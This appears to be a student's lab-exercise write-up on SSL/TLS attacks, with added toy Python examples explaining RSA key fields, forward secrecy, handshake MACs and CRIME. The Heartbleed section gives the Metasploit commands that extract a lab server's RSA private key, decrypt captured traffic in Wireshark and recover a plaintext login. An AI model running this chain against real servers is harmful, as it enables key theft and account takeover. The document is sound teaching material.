- 2.)
- a.)
- (a) Carry out a Heartbleed attack against the vulnerable server using Metasploit and obtain the secret RSA key.
- In Metasploit:
- use auxiliary/scanner/ssl/openssl_heartbleed
- set RHOSTS 192.168.1.10
- set ACTION KEYS
- run
- The newly created file contains the key:
- openssl rsa -in rsa.txt -pubout > key.pub
- (b) Use openssl to break the RSA key down into its components and determine the decryption exponent.
- In the console:
- openssl rsa -text -in rsa.txt -out key.pub
- In key.pub:
- Private-Key: (2048 bit)
- modulus:
- publicExponent: 65537 (0x10001)
- privateExponent:
- prime1:
- prime2:
- exponent1:
- exponent2:
- coefficient:
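
How the fields in the `openssl rsa -text` output relate to each other, as an added example (not part of the original paste): every private component is rebuilt from prime1, prime2 and publicExponent and then cross-checked. The primes are constructed small values, not the lab key.

```python
def derive_components(p, q, e):
    """Rebuild the fields openssl prints from prime1, prime2 and publicExponent."""
    d = pow(e, -1, (p - 1) * (q - 1))   # privateExponent = decryption exponent
    return {
        "modulus": p * q,
        "publicExponent": e,
        "privateExponent": d,
        "prime1": p,
        "prime2": q,
        "exponent1": d % (p - 1),        # d mod (p-1), used for CRT decryption
        "exponent2": d % (q - 1),        # d mod (q-1)
        "coefficient": pow(q, -1, p),    # q^-1 mod p
    }

def check_key(k):
    """Return the names of the consistency checks that fail (empty = consistent)."""
    p, q, e, d = k["prime1"], k["prime2"], k["publicExponent"], k["privateExponent"]
    checks = {
        "modulus == prime1 * prime2": k["modulus"] == p * q,
        "e*d == 1 mod (p-1)": (e * d) % (p - 1) == 1,
        "e*d == 1 mod (q-1)": (e * d) % (q - 1) == 1,
        "exponent1 == d mod (p-1)": k["exponent1"] == d % (p - 1),
        "exponent2 == d mod (q-1)": k["exponent2"] == d % (q - 1),
        "coefficient * q == 1 mod p": (k["coefficient"] * q) % p == 1,
    }
    return [name for name, ok in checks.items() if not ok]

def decrypt_crt(k, c):
    """Decrypt using only the CRT fields (primes, exponent1/2, coefficient)."""
    p, q = k["prime1"], k["prime2"]
    m1 = pow(c, k["exponent1"], p)
    m2 = pow(c, k["exponent2"], q)
    h = (k["coefficient"] * (m1 - m2)) % p
    return m2 + h * q

# Constructed toy key from two Mersenne primes; far too small for real use.
KEY = derive_components(2**31 - 1, 2**61 - 1, 65537)
```
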
- (c) In the lab network, a client connects to this server via SSL at regular intervals and data is exchanged. Try to obtain the content of this data.
- Load the RSA key into Wireshark:
- Edit -> Preferences -> Protocols -> SSL -> RSA keys list -> Edit
- IP address: 192.168.1.10, Port: 443, Protocol: tcp, Key File: rsa.txt, Password: <empty>
- SSL debug file -> ssldebug.txt (newly created)
- A decrypted message:
- GET /private/output.txt HTTP/1.1
- Authorization: Basic aXRzdXNlcjp4T3VXTVZrcWFJbFRIU1JmdnJvcA==
- User-Agent: curl/7.38.0
- Host: 192.168.1.10
- Accept: */*
- Base64 to plaintext:
- aXRzdXNlcjp4T3VXTVZrcWFJbFRIU1JmdnJvcA==
- itsuser:xOuWMVkqaIlTHSRfvrop
- Log in to the page with these credentials: https://192.168.1.10/private/output.txt
- Content of the page: 3873dbad19d9b5edd -
- b.) How does the situation change if TLS with DHE-RSA key exchange is used instead of SSL with RSA key exchange, with the RSA key remaining the same?
- The idea is that even if someone records traffic and compromises the server to get its private key, they won't be able to decipher that traffic, because they'll be missing the ephemeral DH parameters that won't have been saved. With fixed DH, the private DH parameters are effectively the private key: they would also be compromised in the same way and allow the attacker to decipher past traffic too.
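
Why the server's RSA key alone no longer opens recorded traffic under DHE-RSA, as an added example (not part of the original paste): a toy model of both key exchanges in which the RSA key transports the premaster secret in one case and only signs the server's ephemeral DH value in the other. All parameters are constructed and deliberately tiny; the hashing and signing are simplified stand-ins for the real handshake.

```python
import hashlib
import secrets

# Constructed toy parameters (Mersenne primes); far too small for real use.
P, Q, E = 2**31 - 1, 2**61 - 1, 65537
N = P * Q
D = pow(E, -1, (P - 1) * (Q - 1))    # long-term private exponent of the server
DH_P, DH_G = 2**127 - 1, 3           # public DH group

def digest(value):
    """Hash an integer down to a value this toy modulus can sign."""
    return int.from_bytes(hashlib.sha256(str(value).encode()).digest(), "big") % N

def rsa_key_exchange():
    """Client picks the premaster secret and encrypts it to the server's RSA key."""
    premaster = secrets.randbelow(N - 2) + 2
    recorded = {"kx": "RSA", "enc_premaster": pow(premaster, E, N)}
    return premaster, recorded

def dhe_rsa_key_exchange():
    """Both sides use one-time DH secrets; RSA only signs the server's DH value."""
    a = secrets.randbelow(DH_P - 3) + 2   # client ephemeral, discarded afterwards
    b = secrets.randbelow(DH_P - 3) + 2   # server ephemeral, discarded afterwards
    A, B = pow(DH_G, a, DH_P), pow(DH_G, b, DH_P)
    recorded = {"kx": "DHE-RSA", "A": A, "B": B, "sig": pow(digest(B), D, N)}
    return pow(A, b, DH_P), recorded

def recover_with_rsa_key(recorded, d):
    """What the RSA private exponent yields from a recorded handshake."""
    if recorded["kx"] == "RSA":
        return pow(recorded["enc_premaster"], d, N)   # premaster falls out directly
    # DHE-RSA: nothing recorded is encrypted under N. The session secret needs
    # a or b, and neither was sent or kept.
    return None

def signature_valid(recorded):
    """The RSA key's remaining role under DHE-RSA: authenticating the server's B."""
    return pow(recorded["sig"], E, N) == digest(recorded["B"])
```

The RSA key still authenticates the server in new handshakes, so a key that has leaked has to be revoked and replaced in both cases.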
- 3.)
- a.) Describe how "Cipher Suite Rollback" and "ChangeCipherSpec drop" are prevented.
- "The problem was fixed with the release of SSL 3.0 by authenticating all messages of the Handshake Protocol."
- "A hash value of all handshake messages sent and received by the client was included into the computations of the Client Finished message."
- "There are several countermeasures for defending against the Cipher Suite Rollback Attack:
- - Message Authentication to prevent the messages from being modified (Fernandez, E.B. 2013).
- - Sender Authentication that ensures the non-repudiation of the messages. (Fernandez, E.B. 2013; Schumacher et al. 2006)
- - Message integrity that prevents the messages from any modification (Fernandez, E.B. 2013).
- - Confidentiality of traffic flow that prevents traffic analysis (Fernandez, E.B. 2013)."
- "The author’s recommendation is to force both parties to ensure that a ChangeCipherSpec message is received before accepting the Finished message. According to RFC 2246 TLS 1.0 enforces this recommendation."
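
How a hash over all handshake messages in the Finished computation exposes a modified ClientHello, as an added example (not part of the original text). It covers the cipher-suite rollback case only, uses HMAC-SHA256 in place of the SSL 3.0 construction, and assumes a fixed constructed master secret instead of modelling the key exchange.

```python
import hashlib
import hmac

SERVER_PREFERENCE = ["TLS_RSA_WITH_AES_128_CBC_SHA", "TLS_RSA_EXPORT_WITH_RC4_40_MD5"]
MASTER_SECRET = b"constructed-master-secret"   # stands in for the negotiated secret

def finished_mac(handshake_messages):
    """MAC over every handshake message this side sent or received, in order."""
    transcript = hashlib.sha256()
    for msg in handshake_messages:
        transcript.update(len(msg).to_bytes(3, "big") + msg)
    return hmac.new(MASTER_SECRET, transcript.digest(), hashlib.sha256).digest()

def strip_strong_suites(hello):
    """Constructed on-path edit: only the export suite is left in ClientHello."""
    return b"ClientHello:TLS_RSA_EXPORT_WITH_RC4_40_MD5"

def handshake(client_suites, tamper=None):
    """Return (suite the server chose, whether the client's Finished verifies)."""
    sent_hello = b"ClientHello:" + ",".join(client_suites).encode()
    seen_hello = tamper(sent_hello) if tamper else sent_hello
    offered = seen_hello.split(b":", 1)[1].decode().split(",")
    chosen = next(s for s in SERVER_PREFERENCE if s in offered)
    server_hello = b"ServerHello:" + chosen.encode()
    # Each side hashes the messages as it saw them; any edit in transit diverges.
    client_finished = finished_mac([sent_hello, server_hello])
    server_expected = finished_mac([seen_hello, server_hello])
    return chosen, hmac.compare_digest(client_finished, server_expected)
```
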
- b.) Briefly describe the basic idea of "DROWN" and how this attack can be prevented.
- "The exploit includes a chosen-ciphertext attack with the use of an SSLv2 server as a Bleichenbacher oracle."
- "To protect against DROWN, server operators need to ensure that their private keys are not used anywhere with server software that allows SSLv2 connections."
- c.) Briefly describe the basic idea of "CRIME" and how this attack can be prevented. In particular, address what the attacker is after in this attack.
- "CRIME decrypts HTTPS cookies set by websites to remember authenticated users by means of brute force. The attack code forces the victim's browser to send specially crafted HTTPS requests to a targeted website and analyzes the variation in their length after they've been compressed in order to determine the value of the victim's session cookie."
- "This is possible because SSL/TLS and SPDY use a compression algorithm called DEFLATE, which eliminates duplicate strings."
- "CRIME can be defeated by preventing the use of compression, either at the client end, by the browser disabling the compression of SPDY requests, or by the website preventing the use of data compression on such transactions using the protocol negotiation features of the TLS protocol."
- "When used to recover the content of secret authentication cookies, it allows an attacker to perform session hijacking on an authenticated web session, allowing the launching of further attacks."
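
The length leak and the effect of switching compression off, as an added example (not part of the original text): a constructed request is compressed with zlib's DEFLATE, and the record sizes are compared for equal-length injected strings, one of which equals the cookie. The cookie, host and candidate values are made up.

```python
import zlib

COOKIE = "sessionid=7f3a9c21d4e8b605f1a2"   # constructed secret, not from the page

def request_bytes(injected):
    """Request whose path is chosen by another page; the browser adds the cookie."""
    return (f"GET /{injected} HTTP/1.1\r\n"
            "Host: example.test\r\n"
            f"Cookie: {COOKIE}\r\n\r\n").encode()

def record_length(injected, compression):
    """Length visible on the wire (encryption hides content, not size)."""
    data = request_bytes(injected)
    return len(zlib.compress(data, 9)) if compression else len(data)

def observable_lengths(candidates, compression):
    """Distinct record sizes an observer sees across equal-length candidates."""
    return {record_length(c, compression) for c in candidates}

# Equal-length candidates (constructed); only the first equals the cookie.
CANDIDATES = [
    COOKIE,
    "sessionid=0b6d5e17c93a48f2e7d0",
    "sessionid=e41c08a7b2f5963dd05a",
]
```

With compression on, the candidate that duplicates the cookie yields the shortest record; with compression off, every candidate produces the same length and the size carries no information about the cookie.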